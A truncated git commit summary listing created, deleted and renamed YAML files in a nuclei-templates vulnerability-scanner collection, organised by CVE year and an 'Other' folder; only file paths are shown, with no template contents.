nuclei-templates/CVE-2021/CVE-2021-33044.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-33221.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-3377.yaml rename nuclei-templates/CVE-2021/{cve-2021-3378.yaml => CVE-2021-3378.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-33904.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34473.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34621.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34640.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34805.yaml rename nuclei-templates/CVE-2021/{cve-2021-35265.yaml => CVE-2021-35265.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-35464.yaml rename nuclei-templates/CVE-2021/{cve-2021-3577.yaml => CVE-2021-3577.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-36380.yaml => CVE-2021-36380.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-36749.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37216.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37416.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-37589.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37704.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37833.yaml rename nuclei-templates/CVE-2021/{cve-2021-38647.yaml => CVE-2021-38647.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-38702.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39312.yaml rename nuclei-templates/CVE-2021/{cve-2021-39322.yaml => CVE-2021-39322.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39327.yaml rename nuclei-templates/CVE-2021/{cve-2021-39350.yaml => CVE-2021-39350.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-39501.yaml => CVE-2021-39501.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-40149.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40150.yaml rename nuclei-templates/CVE-2021/{cve-2021-40438.yaml => CVE-2021-40438.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40539.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40875.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41174.yaml rename nuclei-templates/CVE-2021/{cve-2021-41192.yaml => CVE-2021-41192.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-41293.yaml => CVE-2021-41293.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-41349.yaml => CVE-2021-41349.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41467.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41569.yaml rename nuclei-templates/CVE-2021/{cve-2021-41653.yaml => CVE-2021-41653.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-41691.yaml => CVE-2021-41691.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41773.yaml rename nuclei-templates/CVE-2021/{cve-2021-41826.yaml => CVE-2021-41826.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41878.yaml rename nuclei-templates/CVE-2021/{cve-2021-41951.yaml => CVE-2021-41951.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42013.yaml rename nuclei-templates/CVE-2021/{cve-2021-42258.yaml => CVE-2021-42258.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42551.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42565.yaml rename nuclei-templates/CVE-2021/{cve-2021-43495.yaml => CVE-2021-43495.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-44529.yaml rename nuclei-templates/CVE-2021/{cve-2021-44848.yaml => CVE-2021-44848.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45043.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45092.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45380.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-45428.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45968.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46379.yaml rename nuclei-templates/CVE-2021/{cve-2021-46381.yaml => CVE-2021-46381.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46387.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46424.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-1499.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20031.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20090.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20091.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20092.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20792.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21745.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21799.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21801.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21802.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21805.yaml rename nuclei-templates/CVE-2021/{CVE-2021-21816.yaml => cve-2021-21816.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-21973.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21985.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-22502.yaml rename nuclei-templates/CVE-2021/{CVE-2021-23241.yaml => cve-2021-23241.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24226.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24276.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24284.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24288.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24298.yaml => cve-2021-24298.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24316.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24335.yaml => cve-2021-24335.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24488.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24510.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24926.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25033.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25063.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25085.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25112.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25281.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25646.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-26247.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-26598.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-26855.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-27132.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-27519.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27561.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-28149.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-28151.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-28164.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-28377.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29203.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29442.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29484.yaml rename nuclei-templates/CVE-2021/{CVE-2021-30151.yaml => cve-2021-30151.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-30461.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-31537.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-31589.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-31856.yaml rename nuclei-templates/CVE-2021/{CVE-2021-32172.yaml => cve-2021-32172.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-3223.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-32305.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-32853.yaml rename nuclei-templates/CVE-2021/{CVE-2021-3293.yaml => cve-2021-3293.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-33044.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-33221.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-3377.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-33904.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34473.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34621.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34640.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34805.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-35464.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-36749.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37216.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37416.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37580.yaml => cve-2021-37580.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-37589.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37704.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37833.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-38702.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-39312.yaml rename nuclei-templates/CVE-2021/{CVE-2021-39316.yaml => cve-2021-39316.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-39327.yaml rename nuclei-templates/CVE-2021/{CVE-2021-39433.yaml => cve-2021-39433.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40149.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40150.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40539.yaml rename nuclei-templates/CVE-2021/{CVE-2021-40868.yaml => cve-2021-40868.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-40875.yaml rename nuclei-templates/CVE-2021/{CVE-2021-40960.yaml => cve-2021-40960.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-40978.yaml => cve-2021-40978.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-41174.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41467.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41569.yaml rename nuclei-templates/CVE-2021/{CVE-2021-41649.yaml => cve-2021-41649.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-41878.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42013.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42551.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42565.yaml rename nuclei-templates/CVE-2021/{CVE-2021-43496.yaml => cve-2021-43496.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-44529.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45043.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45092.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45380.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-45428.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45968.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46379.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46387.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46424.yaml rename nuclei-templates/CVE-2022/{cve-2022-0148.yaml => CVE-2022-0148.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0165.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0201.yaml rename nuclei-templates/CVE-2022/{cve-2022-0271.yaml => CVE-2022-0271.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0288.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0422.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0482.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0540.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0543.yaml rename nuclei-templates/CVE-2022/{cve-2022-0591.yaml => CVE-2022-0591.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0653.yaml rename nuclei-templates/CVE-2022/{cve-2022-0692.yaml => CVE-2022-0692.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0776.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0870.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1040.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1119.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1221.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1388.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1392.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1609.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1904.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1906.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-21500.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2187.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22536.yaml rename nuclei-templates/CVE-2022/{cve-2022-22954.yaml => CVE-2022-22954.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-22963.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22972.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23131.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23134.yaml rename nuclei-templates/CVE-2022/{cve-2022-23347.yaml => CVE-2022-23347.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-23779.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23881.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24112.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24129.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24181.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24260.yaml rename nuclei-templates/CVE-2022/{cve-2022-24288.yaml => CVE-2022-24288.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2486.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2487.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26134.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-26135.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-26138.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26148.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26159.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26233.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26960.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-27927.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-28079.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28080.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28219.yaml rename nuclei-templates/CVE-2022/{cve-2022-28365.yaml => CVE-2022-28365.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29014.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29298.yaml rename nuclei-templates/CVE-2022/{cve-2022-29303.yaml => CVE-2022-29303.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29383.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29548.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-30776.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31268.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31373.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32015.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32022.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32025.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32026.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32409.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-33119.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-34047.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-35416.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-35914.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-36883.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0165.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0201.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0218.yaml => cve-2022-0218.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0288.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0422.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0482.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0540.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0543.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0653.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0776.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0870.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0921.yaml => cve-2022-0921.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1040.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1119.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1221.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1388.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1392.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1609.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1904.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1906.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-21500.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-2187.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22536.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22972.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23131.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23134.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-23779.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23881.yaml rename nuclei-templates/CVE-2022/{CVE-2022-23944.yaml => cve-2022-23944.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-24112.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-24129.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24181.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24260.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-2486.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-2487.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26134.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-26135.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-26138.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26148.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26159.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26233.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26960.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-27927.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-28079.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28080.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29014.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29298.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29383.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29548.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-30776.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31268.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31373.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32015.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32022.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32025.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32026.yaml rename nuclei-templates/CVE-2022/{CVE-2022-32159.yaml => cve-2022-32159.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-32409.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-33119.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-34047.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-35416.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-36883.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-23752.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-35047.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-3836.yaml create mode 100644 nuclei-templates/CVE-2023/Cve-2023-23752.yaml rename nuclei-templates/{Other/gradio-CVE-2024-1561.yaml => CVE-2024/CVE-2024-1561.yaml} (100%) rename nuclei-templates/CVE-2024/{cve-2024-23897.yaml => CVE-2024-23897.yaml} (100%) create mode 100644 nuclei-templates/CVE-2024/CVE-2024-38693.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39641.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39642.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39643.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39646.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39647.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39648.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39649.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39651.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39652.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39653.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39655.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39656.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39658.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39659.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39660.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39661.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39663.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39664.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39665.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39668.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-40422.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-41628.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5057.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5226.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5668.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5975.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6254.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6552.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6824.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6869.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6987.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7008.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7150.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7350.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7486.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7492.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7548.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7560.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7561.yaml delete mode 100644 nuclei-templates/Other/0x71rex-blind-xss.yaml create mode 100644 nuclei-templates/Other/0xlfi3.yaml create mode 100644 nuclei-templates/Other/0xlfifuzz1.yaml rename nuclei-templates/{CVE-2021/CVE-2021-20837.yaml => Other/2021-20837.yaml} (100%) create mode 100644 nuclei-templates/Other/44 - T9.yaml create mode 100644 nuclei-templates/Other/74cms-sqli-10.yaml delete mode 100644 nuclei-templates/Other/74cms-sqli.yaml rename nuclei-templates/Other/{aic-leakage.yaml => AIC-leakage.yaml} (100%) rename nuclei-templates/Other/{apache-ambari-weakpass.yaml => APACHE-Ambari-weakPass.yaml} (100%) create mode 100644 nuclei-templates/Other/API-Linkfinder.yaml delete mode 100644 nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml create mode 100644 nuclei-templates/Other/ATHD-DVR-fileRead.yaml rename nuclei-templates/Other/{advantech-webaccess.yaml => Advantech-WebAccess.yaml} (100%) delete mode 100644 nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml rename nuclei-templates/Other/{apereo-cas-rce.yaml => Apereo-Cas-rce.yaml} (100%) rename nuclei-templates/Other/{b2bbuilder-sqli.yaml => B2BBuilder-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/BOA-Web-fileRead.yaml rename nuclei-templates/Other/{biometric-detect.yaml => Biometric-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/Bitrix_check_env.yaml create mode 100644 nuclei-templates/Other/BlindSQL.yaml create mode 100644 nuclei-templates/Other/CL-TE-http-smuggling.yaml create mode 100644 nuclei-templates/Other/CNVD-2019-17294.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-56167.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-17369.yaml rename nuclei-templates/Other/{cnvd-2021-28277-1107.yaml => CNVD-2021-28277.yaml} (100%) create mode 100644 nuclei-templates/Other/CRMEB-sqli.yaml rename nuclei-templates/{CVE-2023/CVE-2023-49442.yaml => Other/CVE_2023_49442.yaml} (100%) create mode 100644 nuclei-templates/Other/Cache_to_xss.yaml rename nuclei-templates/Other/{diaowen-fileread.yaml => DIAOWEN-fileRead.yaml} (100%) rename nuclei-templates/Other/{Dahua_getFaceCapture_Sqli.yaml => Dahua_Video_FileUpload.yaml} (100%) rename nuclei-templates/Other/{e-message-database.yaml => E-message-database.yaml} (100%) delete mode 100644 nuclei-templates/Other/GLPI-9.3.3-SQL-Injection.yaml rename nuclei-templates/Other/{hadoop-yarn-rpc-rce.yaml => Hadoop-Yarn-RPC-RCE.yaml} (100%) rename nuclei-templates/Other/{Hikvision_Env_Information_Leakage.yaml => Hikvision_iVMS-8700_Fileupload_Files.yaml} (100%) rename nuclei-templates/Other/{Hikvision_iVMS-8700_upload_action.yaml => Hikvision_iVMS-8700_upload.yaml} (100%) rename nuclei-templates/Other/{jeewms-fileread.yaml => JEEWMS-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml delete mode 100644 nuclei-templates/Other/MinIO-default-login.yaml rename nuclei-templates/Other/{mobileiron(1).yaml => MobileIron.yaml} (100%) rename nuclei-templates/Other/{netsurveillance-fileread.yaml => NETSurveillance-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml delete mode 100644 nuclei-templates/Other/Nsfocus_sas_Exec.yaml create mode 100644 nuclei-templates/Other/Panabit-sy_addmount-rce.yaml rename nuclei-templates/Other/{0xlfi.yaml => Path-Traversal.yaml} (100%) rename nuclei-templates/Other/{Redmine-Default-Login.yaml => RedMine-Detect.yaml} (100%) rename nuclei-templates/Other/{Ruijie_EXCU_SHELL.yaml => Ruijie_NBR_Router_fileupload.yaml} (100%) delete mode 100644 nuclei-templates/Other/SQLInjection_ERROR.yaml rename nuclei-templates/Other/{sitecore.yaml => SiteCore.yaml} (100%) create mode 100755 nuclei-templates/Other/Springboot-Loggers.yaml create mode 100644 nuclei-templates/Other/Symantec-Messaging-Gateway.yaml create mode 100755 nuclei-templates/Other/WP-Vault-LFI.yaml create mode 100644 nuclei-templates/Other/WooYun-2015-148227.yaml rename nuclei-templates/Other/{X-Host .yaml => X-Host.yaml} (100%) rename nuclei-templates/Other/{X-Remote-IP.yaml => X-Remote-IP .yaml} (100%) rename nuclei-templates/Other/{abyss-web-server-12.yaml => abyss-web-server.yaml} (100%) rename nuclei-templates/Other/{accent-microcomputers-lfi-17.yaml => accent-microcomputers-lfi-14.yaml} (100%) delete mode 100644 nuclei-templates/Other/acemanager-login-25.yaml create mode 100644 nuclei-templates/Other/acemanager-login.yaml rename nuclei-templates/Other/{acme-xss.yaml => acme-xss-28.yaml} (100%) delete mode 100644 nuclei-templates/Other/acontent-detect-32.yaml create mode 100644 nuclei-templates/Other/acontent-detect-33.yaml rename nuclei-templates/Other/{acquia-takeover-35.yaml => acquia-takeover.yaml} (100%) rename 